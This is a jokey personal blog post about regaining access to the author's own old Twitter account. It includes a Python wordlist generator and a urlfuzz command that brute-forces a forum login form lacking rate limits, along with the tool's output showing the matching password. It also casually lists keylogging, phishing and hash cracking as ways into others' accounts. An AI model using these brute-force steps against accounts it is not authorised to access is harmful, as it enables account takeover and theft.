Go Hack Yourself

Bam Bam Bam, Hacked!

We’ve all at one point in our lives, wanted to get rid of an old online account that we forgot the password to. For whatever the reason may be, most of the time it seems impossible to ever log back in, but not for a hacker…

Me hacking the FBI

Yeah yeah yeah, we get it. You hack. So why don’t you delete that old Twitter account where you tweeted cringey shit and didn’t disable YouTube’s activity sharing, now everyone knows you watch Jake Paul.

Real Tweet BTW

Well, the truth is….I can’t. There are 3 methods to hack a social media account:

  1. Phishing/Social Engineering
  2. 0days
  3. Misc (Cracking Hashes, Keylogging, Physical Access, OSINT, Etc.)

It really varies for everyones situation. Remember, hacking a social media account is all about getting the password, nothing else. Even if it requires breaking into a government owned building, knocking out 20 security guards, getting physcial access to your victims machine, and stealing that juicy password hash, just to spend 1 week trying to crack it. Come to think of it, you could have just installed a keylogger…

REEEEEE

Do you see where I’m going with this? The possibilities are endless. Social engineering plays a huge part, but it’s really not a factor when you’re hacking….yourself. In fact, this is where things get more interesting. I gave up on deleting my old Twitter account from middle school ages ago, but recently I took it as a challenge to hack back into that sucker.

Here I come Twitter!

Scavenging/Brainstorming

The number one rule when trying to get back into an old account is scavenging for old passwords. I noted all of my old passwords down in a text file and then attempted them on my Twitter account. None of them worked, obviously. So the next thing I tried was Google Dorking for old accounts I used to own under this alias. Lets just say I went by the name bobbyjoe93 for my sake and privacy.

I quickly discovered multiple forum accounts, but most importantly an old YouTube channel. Horrible videos I made in middle school had been public for all this time, and I didn’t even bother to take them down?

Bruh Momentum

This was the same Google account linked to my Twitter, so:

Pwn Google = Pwn Twitter

Attempting all of my old passwords on Google didn’t seem to work either, but I did get something interesting:

Damn, that was a long time ago...

Like a soldier suffering from PTSD, when I saw this message, my brain had clicked and I remembered something very important. When I was in middle school, I changed all of my accounts under this alias to use the password I had already been using, but I appended 4 digits to it. I guess little me thought that adding 4 digits would make me unhackable. The only issue is, I don’t remember what the 4 digits were, I just remember adding 4 digits. Brute forcing the numbers would be impossible on Google or Twitter, so I basically gave up at this point.

Okay

But then…….

Shitty Minecraft Forums FTW

Lets goooooo!

To put things short, I found an account registered on some Minecraft forum I used to use, that had no rate limitation on the login…

Pwn Forum = Pwn Google = Pwn Twitter

It’s simple: make a shitty script, that generates a shitty wordlist of shitty passwords, and brute force the fuck out of the shitty site.

import itertools  

myfile = open('wordlist.txt', 'w')

for i in itertools.product(range(10), repeat=4):
	myfile.write("shittypassword" + "%s\n" % ''.join(map(str, i)))  
myfile.close()

Now we run this bad boy:

frinto@pwnie:/tmp/brute-force$ python3 pass-gen.py 
frinto@pwnie:/tmp/brute-force$ wc -l wordlist.txt 
10000 wordlist.txt
frinto@pwnie:/tmp/brute-force$ cat wordlist.txt 
shittypassword0000
shittypassword0001
shittypassword0002
shittypassword0003
shittypassword0004

I’ll be using URLFuzz to brute force the login form, but you can use any tool of your liking. Heck, you can even make another shitty script for that too!

frinto@pwnie:~$ urlfuzz https://example.com/login -d 'username=bobbyjoe93&password=#FUZZ#' -w /tmp/brute-force/wordlist.txt --hc=404,401

  ██╗   ██╗██████╗ ██╗     ███████╗██╗   ██╗███████╗███████╗ 
  ██║   ██║██╔══██╗██║     ██╔════╝██║   ██║╚══███╔╝╚══███╔╝ 
  ██║   ██║██████╔╝██║     █████╗  ██║   ██║  ███╔╝   ███╔╝  
  ██║   ██║██╔══██╗██║     ██╔══╝  ██║   ██║ ███╔╝   ███╔╝   
  ╚██████╔╝██║  ██║███████╗██║     ╚██████╔╝███████╗███████╗ 
   ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝      ╚═════╝ ╚══════╝╚══════╝ 

Version: 0.0.0

================================================================================

 Fuzz URL    : https://example.com/login
 POST data   : username=bobbyjoe93&password=#FUZZ#
 Filtered    : C=404,401
 Fuzz type   : Wordlist
 Server      : EOS (vny006/044E)
 Resp. codes : 200 OK 204 Empty 301 Moved 401 Unauth. 404 NotFound 500 SrvError 
 
 = CODE ======== LINES ======== WORDS == VALUE ====================================
   200             13             29    shittypassword3782

2 fucking EZ…

Me and Da Boys

Written on August 31, 2019